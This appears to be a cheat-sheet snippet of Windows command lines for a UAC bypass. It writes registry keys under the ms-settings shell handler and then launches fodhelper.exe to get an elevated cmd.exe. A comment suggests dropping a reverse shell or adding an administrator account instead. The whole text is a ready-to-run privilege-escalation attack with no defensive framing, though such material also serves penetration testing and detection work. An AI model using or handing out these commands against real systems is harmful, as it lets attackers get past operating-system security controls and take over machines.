reg add HKCU\Software\Classes\ms-settings\Shell\Open\command reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f # or drop a reverse shell binary, add an administrator, etc C:\Windows\System32\fodhelper.exe # or C:\Windows\SysNative\fodhelper.exe or %windir%\SysNative\fodhelper.exe if shell is running in 32-bit